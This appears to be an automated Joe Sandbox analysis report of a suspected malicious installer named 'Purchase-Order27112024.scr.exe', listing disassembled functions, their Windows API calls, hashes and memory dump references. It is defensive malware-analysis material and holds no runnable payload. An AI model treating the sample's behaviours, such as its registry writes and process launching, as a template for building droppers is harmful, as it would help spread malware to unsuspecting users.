                                                                                                      • Opcode ID: c6112705f82b7b1622065ee3eab6168811afede877eaf12318c42c814ff79ec4
                                                                                                      • Instruction ID: 22a22a0f5d261001ccd7191b61e6a6ae22ba545f5f0eb33ed6189b5534195358
                                                                                                      • Opcode Fuzzy Hash: c6112705f82b7b1622065ee3eab6168811afede877eaf12318c42c814ff79ec4
                                                                                                      • Instruction Fuzzy Hash: 3341C071900515BACF11BBB5CC86EAF3679EF06369F20423BF422B10E1C73C8A419A6D
                                                                                                      APIs
                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 3700715C
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 3700717F
                                                                                                        • Part of subcall function 370056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 37005702
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 370071A5
                                                                                                      • _free.LIBCMT ref: 370071B8
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 370071C7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 336800556-0
                                                                                                      • Opcode ID: e8d34e7397f4b84aa483a95007719bd212542d0103ec6c000a6beffb42f5f938
                                                                                                      • Instruction ID: 6ab99468e70b3e5abf5d318bcc4f7d013e66f23a15a9cbf85c9812b4b4201a74
                                                                                                      • Opcode Fuzzy Hash: e8d34e7397f4b84aa483a95007719bd212542d0103ec6c000a6beffb42f5f938
                                                                                                      • Instruction Fuzzy Hash: 4C01D8B6641215BF7B120ABE5C4CDBB2AADEBC69B035101ADBD04D7380DF689C0289B1
                                                                                                      APIs
                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close$DeleteEnumOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1912718029-0
                                                                                                      • Opcode ID: 7fa7a74cbbe584c41cdd651777289953afc00df8a6fd94206c47d0172b2a88ac
                                                                                                      • Instruction ID: 39c85bfe7ca74ada2351cc0a51ccebcd1f3e21716521df4e7e96f28c7df0de5f
                                                                                                      • Opcode Fuzzy Hash: 7fa7a74cbbe584c41cdd651777289953afc00df8a6fd94206c47d0172b2a88ac
                                                                                                      • Instruction Fuzzy Hash: 5B116A31904008FEEF229F90DE89EAE3B7DFB14348F100476FA01B00A0D3B59E51EA69
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,3700636D,37005713,00000000,?,37002249,?,?,37001D66,00000000,?,?,00000000), ref: 37005B7F
                                                                                                      • _free.LIBCMT ref: 37005BB4
                                                                                                      • _free.LIBCMT ref: 37005BDB
                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37005BE8
                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37005BF1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 3170660625-0
                                                                                                      • Opcode ID: d9f3aae9f406ef9adb9a1a47a5859437ce6237a488401c6cb094cd7d1f916cff
                                                                                                      • Instruction ID: 2902feee5783b797f98a7dbe13d83c1bab29286b60b3f71b678687773d6ca053
                                                                                                      • Opcode Fuzzy Hash: d9f3aae9f406ef9adb9a1a47a5859437ce6237a488401c6cb094cd7d1f916cff
                                                                                                      • Instruction Fuzzy Hash: EE01F9FA144B01ABF20256F81D49F1F2AED9BC55B471200E4F929F2141EE6CA9024D65
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,370010DF,?,?,?,00000000), ref: 37001E9A
                                                                                                      • lstrcatW.KERNEL32(?,?,?,370010DF,?,?,?,00000000), ref: 37001EAC
                                                                                                      • lstrlenW.KERNEL32(?,?,370010DF,?,?,?,00000000), ref: 37001EB3
                                                                                                      • lstrlenW.KERNEL32(?,?,370010DF,?,?,?,00000000), ref: 37001EC8
                                                                                                      • lstrcatW.KERNEL32(?,370010DF,?,370010DF,?,?,?,00000000), ref: 37001ED3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$lstrcat
                                                                                                      • String ID:
                                                                                                      • API String ID: 493641738-0
                                                                                                      • Opcode ID: 043130cfe89e12fa9bdea119c1982104896d853cb263fb7d77c689e0f6aeb465
                                                                                                      • Instruction ID: 495e4635c0b4c9b12945208998f4086f55c22c23a7bbe3aca37ef7d482c0888f
                                                                                                      • Opcode Fuzzy Hash: 043130cfe89e12fa9bdea119c1982104896d853cb263fb7d77c689e0f6aeb465
                                                                                                      • Instruction Fuzzy Hash: 5DF054361401107AE6212719AC85F7F7BBCFF85B70F440019F60CA31909B58684296B5
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 370091D0
                                                                                                        • Part of subcall function 3700571E: HeapFree.KERNEL32(00000000,00000000,?,3700924F,?,00000000,?,00000000,?,37009276,?,00000007,?,?,37007E5A,?), ref: 37005734
                                                                                                        • Part of subcall function 3700571E: GetLastError.KERNEL32(?,?,3700924F,?,00000000,?,00000000,?,37009276,?,00000007,?,?,37007E5A,?,?), ref: 37005746
                                                                                                      • _free.LIBCMT ref: 370091E2
                                                                                                      • _free.LIBCMT ref: 370091F4
                                                                                                      • _free.LIBCMT ref: 37009206
                                                                                                      • _free.LIBCMT ref: 37009218
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: d90697731e015edeca4d4b1817c2a611af8fdf1ba77c6726d27be154a120642f
                                                                                                      • Instruction ID: 4df4b7ad5797aa979b6458e971c147172d08a765178fc7134c919c067fab46e9
                                                                                                      • Opcode Fuzzy Hash: d90697731e015edeca4d4b1817c2a611af8fdf1ba77c6726d27be154a120642f
                                                                                                      • Instruction Fuzzy Hash: 80F04FF55646409FE624DAACE6C9C46BBDDFB093313920885FC89E7500CA28F8809E54
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 1849352358-0
                                                                                                      • Opcode ID: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                                                                      • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                                                                      • Opcode Fuzzy Hash: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                                                                      • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                                      APIs
                                                                                                      • GetDC.USER32(?), ref: 00401D44
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                      • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 3808545654-0
                                                                                                      • Opcode ID: e505f65a548bf0974f6aee529334db0e8f2b0f649825e5e5403c9d7ad871e098
                                                                                                      • Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
                                                                                                      • Opcode Fuzzy Hash: e505f65a548bf0974f6aee529334db0e8f2b0f649825e5e5403c9d7ad871e098
                                                                                                      • Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 3700536F
                                                                                                        • Part of subcall function 3700571E: HeapFree.KERNEL32(00000000,00000000,?,3700924F,?,00000000,?,00000000,?,37009276,?,00000007,?,?,37007E5A,?), ref: 37005734
                                                                                                        • Part of subcall function 3700571E: GetLastError.KERNEL32(?,?,3700924F,?,00000000,?,00000000,?,37009276,?,00000007,?,?,37007E5A,?,?), ref: 37005746
                                                                                                      • _free.LIBCMT ref: 37005381
                                                                                                      • _free.LIBCMT ref: 37005394
                                                                                                      • _free.LIBCMT ref: 370053A5
                                                                                                      • _free.LIBCMT ref: 370053B6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: 0120d249561b4378308d8d151e897e48356af91bb66e704f4ec264ed349b72de
                                                                                                      • Instruction ID: 49d6428b3335a17e6bfea238a0304b787e2e79791a8809aa5935b7151f4f5acd
                                                                                                      • Opcode Fuzzy Hash: 0120d249561b4378308d8d151e897e48356af91bb66e704f4ec264ed349b72de
                                                                                                      • Instruction Fuzzy Hash: BFF0B7FC894524DFDA019B7CAA96808BFF5E71CA70353018AFC14A7360DB3D4543AE85
                                                                                                      APIs
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Purchase-Order27112024.scr.exe,00000104), ref: 37004C1D
                                                                                                      • _free.LIBCMT ref: 37004CE8
                                                                                                      • _free.LIBCMT ref: 37004CF2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$FileModuleName
                                                                                                      • String ID: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                      • API String ID: 2506810119-1268897370
                                                                                                      • Opcode ID: 50876530528cb9bc9469673ebec7eb3c84266a327e96b060b640588f6ac0af76
                                                                                                      • Instruction ID: 2918cd10c2e5b70fcc42b2464eb826e762419abef37a417a4f4b45c2f9ef9c67
                                                                                                      • Opcode Fuzzy Hash: 50876530528cb9bc9469673ebec7eb3c84266a327e96b060b640588f6ac0af76
                                                                                                      • Instruction Fuzzy Hash: CE314275A40218EFEB11DBA98981E9EBBF9EB89330F1140DAF804A7200D6749A41CF55
                                                                                                      APIs
                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Timeout
                                                                                                      • String ID: !
                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                      • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                                                                      • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                                                                      • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                                                                      • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,37006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 37008731
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 370087BA
                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 370087CC
                                                                                                      • __freea.LIBCMT ref: 370087D5
                                                                                                        • Part of subcall function 370056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 37005702
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                      • String ID:
                                                                                                      • API String ID: 2652629310-0
                                                                                                      • Opcode ID: 18b25a70f329e98e74191be11129ac3d2b9b3afc411a7e763e6b033b4092766f
                                                                                                      • Instruction ID: 5d9b49e4c4e8a4086c99f6c602dceeb8e1640c4804bc68a8c8b05de1df29b46e
                                                                                                      • Opcode Fuzzy Hash: 18b25a70f329e98e74191be11129ac3d2b9b3afc411a7e763e6b033b4092766f
                                                                                                      • Instruction Fuzzy Hash: 22319076A0021A9FEB15CF64CC89EAE7BA5EF44330F0141A8EC18E6194E735D991DFA1
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 00403192
                                                                                                        • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                                      • WriteFile.KERNEL32(0040BE90,?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Pointer$CountTickWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 2146148272-0
                                                                                                      • Opcode ID: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                                                                      • Instruction ID: 34320a24581f7621071559271f75aff2a33e70c32c739a51ea230fcf3b1a2f41
                                                                                                      • Opcode Fuzzy Hash: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                                                                      • Instruction Fuzzy Hash: CB418B72504205DFDB109F29EE84AA63BADF74431671441BFE604B22E1C7B96D418BEC
                                                                                                      APIs
                                                                                                      • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                      • lstrlenW.KERNEL32(0040A598,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateValuelstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1356686001-0
                                                                                                      • Opcode ID: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                                                                      • Instruction ID: 1c964708cf89b7fac74d07524040b6b2ab84de1cfba919da144199f52892a02b
                                                                                                      • Opcode Fuzzy Hash: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                                                                      • Instruction Fuzzy Hash: A51190B1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D7B85E409B29
                                                                                                      APIs
                                                                                                        • Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,00436800,?,76232EE0,004057F0,?,00436800,76232EE0,00434000), ref: 00405A4C
                                                                                                        • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                                                                                        • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                                                                                      • CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                                      • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 3751793516-0
                                                                                                      • Opcode ID: 7fc8d92597ca224d1c9d0f403f8dd560b19a4790d4067b824d9ac869d91d7f68
                                                                                                      • Instruction ID: 602e027c19ef8137931421d3e2870900c2c1aa36f58208ee64056e3add0ea48c
                                                                                                      • Opcode Fuzzy Hash: 7fc8d92597ca224d1c9d0f403f8dd560b19a4790d4067b824d9ac869d91d7f68
                                                                                                      • Instruction Fuzzy Hash: 4F11C271904200EBCF206FA0CD449AE7AB4FF14369B34463BF881B62E1D23D49419A6E
                                                                                                      APIs
                                                                                                      • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                      • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                      • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 1404258612-0
                                                                                                      • Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                                                                      • Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
                                                                                                      • Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                                                                      • Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68
                                                                                                      APIs
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                                                        • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                                                                        • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                      Memory Dump Source
